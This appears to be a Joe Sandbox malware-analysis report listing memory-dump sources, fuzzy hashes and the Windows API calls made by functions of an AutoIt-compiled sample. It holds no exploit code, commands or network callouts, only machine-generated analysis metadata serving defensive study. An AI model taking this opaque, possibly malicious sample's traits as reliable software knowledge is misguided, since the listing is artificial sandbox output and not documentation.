• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: DialogNtdllProc_
• String ID:
• API String ID: 3239928679-0
• Opcode ID: 0200bc6d8a35767da7688a5abf23280444a048e0bbc3365ce649b394140e164a
• Instruction ID: 93cc7d15e34d9a6e9b6b113410c5ef3f5f1d4155a32c6e2ef3c4e460b679d6c1
• Opcode Fuzzy Hash: 0200bc6d8a35767da7688a5abf23280444a048e0bbc3365ce649b394140e164a
• Instruction Fuzzy Hash: 8FE0E234204248EFCB01DF85EC44E863BA5EB5A350F050094FD058B262C772A864EBA1

APIs
• NtdllDialogWndProc_W.NTDLL ref: 00E4F5D0
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: DialogNtdllProc_
• String ID:
• API String ID: 3239928679-0
• Opcode ID: 52d1d727fbe7c33eec5a9cd8caf85e23583812dd27d7939cd5788b9b51dcb291
• Instruction ID: a448a724838a264215b3ef268ddd8fa35ba66a41497d3fe91c130a709ae1053e
• Opcode Fuzzy Hash: 52d1d727fbe7c33eec5a9cd8caf85e23583812dd27d7939cd5788b9b51dcb291
• Instruction Fuzzy Hash: F3E0E234204248EFCB01DF85EC44E863BA5EB5A350F050094FD059B261C771A820DB61

APIs
  • Part of subcall function 00DFB34E: GetWindowLongW.USER32(?,000000EB), ref: 00DFB35F
  • Part of subcall function 00DFB73E: DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00DFB72B), ref: 00DFB7F6
  • Part of subcall function 00DFB73E: KillTimer.USER32(00000000,?,00000000,?,?,?,?,00DFB72B,00000000,?,?,00DFB2EF,?,?), ref: 00DFB88D
• NtdllDialogWndProc_W.NTDLL(?,00000002,00000000,00000000,00000000,?,?,00DFB2EF,?,?), ref: 00DFB734
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: Window$DestroyDialogKillLongNtdllProc_Timer
• String ID:
• API String ID: 2797419724-0
• Opcode ID: d1c44346cf67b54f20a8f40c70ad1cf73f3bd8c39f9ac9b5a2bfa5803fa310ac
• Instruction ID: 875491d23e781a307ed2f9feb43b82e7fe2d5a52dbbc9d8e363882b84034142d
• Opcode Fuzzy Hash: d1c44346cf67b54f20a8f40c70ad1cf73f3bd8c39f9ac9b5a2bfa5803fa310ac
• Instruction Fuzzy Hash: 59D0123068430CBBDB103B51DD07F593A5EDB94760F548011B7057D1E1CBB165505575

APIs
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: NameUser
• String ID:
• API String ID: 2645101109-0
• Opcode ID: 81e2048e8285291d92d7a09f1ca2f2126056e96525ca690adec86e35a255b2e5
• Instruction ID: 811a34cc850e0adb0cb8d5a6ddce6fc0e0c45a48c8b6156b68352a39c5ce531f
• Opcode Fuzzy Hash: 81e2048e8285291d92d7a09f1ca2f2126056e96525ca690adec86e35a255b2e5
• Instruction Fuzzy Hash: 54C04CB1804109DFC751CBC0DD489EFB7BCAB04301F1451A1D205F1110D7709B499B72

APIs
• SetUnhandledExceptionFilter.KERNEL32(?), ref: 00E0818F
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
• Opcode ID: 895e9ce47f2fb1ffa6b2a4af53c9dbd5c4ae6d46018bd8d762a9551e1c4bde3f
• Instruction ID: 6673641fabe28bce85d803f50c89fa2d462194c268b30fb82e59cda775c1692a
• Opcode Fuzzy Hash: 895e9ce47f2fb1ffa6b2a4af53c9dbd5c4ae6d46018bd8d762a9551e1c4bde3f
• Instruction Fuzzy Hash: 7EA0113008820CAB8F002B83FC0888A3F2CEB002A0B800020F80C002208BA2A8208A82

Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2dcf35a14e1db201c69c601a4eb03d7c4eea809e20864ffc5f28eb9e66322de9
• Instruction ID: c69fc5057d8ea878d0de5c8c1064ff4d213006ce13ea7661c5d85bb9959e9d71
• Opcode Fuzzy Hash: 2dcf35a14e1db201c69c601a4eb03d7c4eea809e20864ffc5f28eb9e66322de9
• Instruction Fuzzy Hash: EF22BF70904259CFDB24EF59D480ABEB7F1FF58304F188469E98AAB351E331E945CBA1

                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 5c5042217a3accfdcbb6a7475aa0f78f47a388aa957b24a5aefd68b61f337523
                                                                                                                  • Instruction ID: a10bdd42c34a9d610822b9224be5a7f052f5401c1ab1bdc9767379a6c3872c09
                                                                                                                  • Opcode Fuzzy Hash: 5c5042217a3accfdcbb6a7475aa0f78f47a388aa957b24a5aefd68b61f337523
                                                                                                                  • Instruction Fuzzy Hash: DE127E70A002499FDF04EFA5D991AAEB7F5FF48300F10852AE946F7290EB35A915CB64
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Exception@8Throwstd::exception::exception
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3728558374-0
                                                                                                                  • Opcode ID: b8c9702ff30c085135096a0ac5d8223ea16bf411adc67cd80aa71fed34c4fbbb
                                                                                                                  • Instruction ID: eacb6e03fcd7023aa2312fd7151ee97843888cb49eaadcbc8b02d00076f16ad4
                                                                                                                  • Opcode Fuzzy Hash: b8c9702ff30c085135096a0ac5d8223ea16bf411adc67cd80aa71fed34c4fbbb
                                                                                                                  • Instruction Fuzzy Hash: B502D470A00209DFCF04EF69D9816AEB7B5FF45310F14C46AE906EB255EB31EA15CBA1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                                                                  • Instruction ID: 76d9d67209d2740eb171e78b65df8f251952c86966c2bae7afc5441061337503
                                                                                                                  • Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                                                                  • Instruction Fuzzy Hash: B6C1D2322051970ADF2D473A843453EBBA15EA2BB571E276DE8B3DB4D1EF20C5B4D620
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                                                                  • Instruction ID: 47a30448b567cabbed28f10b6bc80e58a0c61f9dd19eb77368b6f56f2d8cda7b
                                                                                                                  • Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                                                                  • Instruction Fuzzy Hash: A6C1F2322051970ADF2D463AC43463EBAA15EA2BB570F636DE4B3DB0D5EF20C5B4D620
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                                  • Instruction ID: cb948d3169fa952485451e08acf8a326c5b4d30975ef5c1a6909d1415e3d9aec
                                                                                                                  • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                                  • Instruction Fuzzy Hash: C9C18F3220509B09DB2D473A847443EBAA15EA2BB131F877DE9B2CB5D5EE20C574D630
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2070917198.00000000010B8000.00000040.00000020.00020000.00000000.sdmp, Offset: 010B8000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_10b8000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                                                                  • Instruction ID: 00f32b9e56f9b2fc02c78271d89ac2c7ae64e2ec014b34792e6c155bd9d2554c
                                                                                                                  • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                                                                  • Instruction Fuzzy Hash: C641C071D1051CEBCF48CFADC991AEEBBF2AF88201F548299D556AB345D730AB41DB80
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2070917198.00000000010B8000.00000040.00000020.00020000.00000000.sdmp, Offset: 010B8000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_10b8000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                                                                  • Instruction ID: 9e0bc4200bb7cc226fe635c66edf5f44805276de88130255479ff9ea9605ec73
                                                                                                                  • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                                                                  • Instruction Fuzzy Hash: A3018078A00109EFCB44DF98C5909AEF7F5FB48210B208599D959A7701D730AE41DB80
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2070917198.00000000010B8000.00000040.00000020.00020000.00000000.sdmp, Offset: 010B8000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_10b8000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                                                                  • Instruction ID: bb0d65006d4800dd0286d50ace2848c235eb1519288841af9ba4dea66bc398bd
                                                                                                                  • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                                                                  • Instruction Fuzzy Hash: 67019278A00109EFCB84DF98C5909AEF7F5FB48310F2485D9D859A7301D730AE41DB80
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2070917198.00000000010B8000.00000040.00000020.00020000.00000000.sdmp, Offset: 010B8000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_10b8000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                                                                  • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                                                                                  • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                                                                  • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                                                                                  APIs
                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00E3A2FE
                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00E3A310
                                                                                                                  • DestroyWindow.USER32 ref: 00E3A31E
                                                                                                                  • GetDesktopWindow.USER32 ref: 00E3A338
                                                                                                                  • GetWindowRect.USER32(00000000), ref: 00E3A33F
                                                                                                                  • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00E3A480
                                                                                                                  • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00E3A490
                                                                                                                  • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E3A4D8
                                                                                                                  • GetClientRect.USER32(00000000,?), ref: 00E3A4E4
                                                                                                                  • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00E3A51E
                                                                                                                  • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E3A540
                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E3A553
                                                                                                                  • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E3A55E
                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00E3A567
                                                                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E3A576
                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00E3A57F
                                                                                                                  • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E3A586
                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00E3A591
                                                                                                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,88C00000), ref: 00E3A5A3
                                                                                                                  • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00E6D9BC,00000000), ref: 00E3A5B9
                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00E3A5C9
                                                                                                                  • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00E3A5EF
                                                                                                                  • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00E3A60E
                                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E3A630
                                                                                                                  • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E3A81D
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                  • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                  • API String ID: 2211948467-2373415609
                                                                                                                  • Opcode ID: 09c6c6fbaab04db27e2cfc87cd0204661eb98c82040d9b896cf832178127dcb1
                                                                                                                  • Instruction ID: 4b456a9449091dc255d958710131ed8de691f677e593f3f7ce8045ee22d34939
                                                                                                                  • Opcode Fuzzy Hash: 09c6c6fbaab04db27e2cfc87cd0204661eb98c82040d9b896cf832178127dcb1
                                                                                                                  • Instruction Fuzzy Hash: 32029B75A00204EFDB14DFA5DC89EAE7BB9FF49350F148158F915AB2A0CBB0AD45CB60
                                                                                                                  APIs
                                                                                                                  • SetTextColor.GDI32(?,00000000), ref: 00E4D2DB
                                                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 00E4D30C
                                                                                                                  • GetSysColor.USER32(0000000F), ref: 00E4D318
                                                                                                                  • SetBkColor.GDI32(?,000000FF), ref: 00E4D332
                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 00E4D341
                                                                                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 00E4D36C
                                                                                                                  • GetSysColor.USER32(00000010), ref: 00E4D374
                                                                                                                  • CreateSolidBrush.GDI32(00000000), ref: 00E4D37B
                                                                                                                  • FrameRect.USER32(?,?,00000000), ref: 00E4D38A
                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00E4D391
                                                                                                                  • InflateRect.USER32(?,000000FE,000000FE), ref: 00E4D3DC
                                                                                                                  • FillRect.USER32(?,?,00000000), ref: 00E4D40E
                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00E4D439
                                                                                                                    • Part of subcall function 00E4D575: GetSysColor.USER32(00000012), ref: 00E4D5AE
                                                                                                                    • Part of subcall function 00E4D575: SetTextColor.GDI32(?,?), ref: 00E4D5B2
                                                                                                                    • Part of subcall function 00E4D575: GetSysColorBrush.USER32(0000000F), ref: 00E4D5C8
                                                                                                                    • Part of subcall function 00E4D575: GetSysColor.USER32(0000000F), ref: 00E4D5D3
                                                                                                                    • Part of subcall function 00E4D575: GetSysColor.USER32(00000011), ref: 00E4D5F0
                                                                                                                    • Part of subcall function 00E4D575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00E4D5FE
                                                                                                                    • Part of subcall function 00E4D575: SelectObject.GDI32(?,00000000), ref: 00E4D60F
                                                                                                                    • Part of subcall function 00E4D575: SetBkColor.GDI32(?,00000000), ref: 00E4D618
                                                                                                                    • Part of subcall function 00E4D575: SelectObject.GDI32(?,?), ref: 00E4D625
                                                                                                                    • Part of subcall function 00E4D575: InflateRect.USER32(?,000000FF,000000FF), ref: 00E4D644
                                                                                                                    • Part of subcall function 00E4D575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00E4D65B
                                                                                                                    • Part of subcall function 00E4D575: GetWindowLongW.USER32(00000000,000000F0), ref: 00E4D670
                                                                                                                    • Part of subcall function 00E4D575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00E4D698
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3521893082-0
                                                                                                                  • Opcode ID: 6bab5f8ca1735509fb1f19cf448452aee5b0d447b18069dc41d3228434a72e9b
                                                                                                                  • Instruction ID: c2889da29472458cd06fd810858ce14562b5583d9a34f6f4bf158e7f23489590
                                                                                                                  • Opcode Fuzzy Hash: 6bab5f8ca1735509fb1f19cf448452aee5b0d447b18069dc41d3228434a72e9b
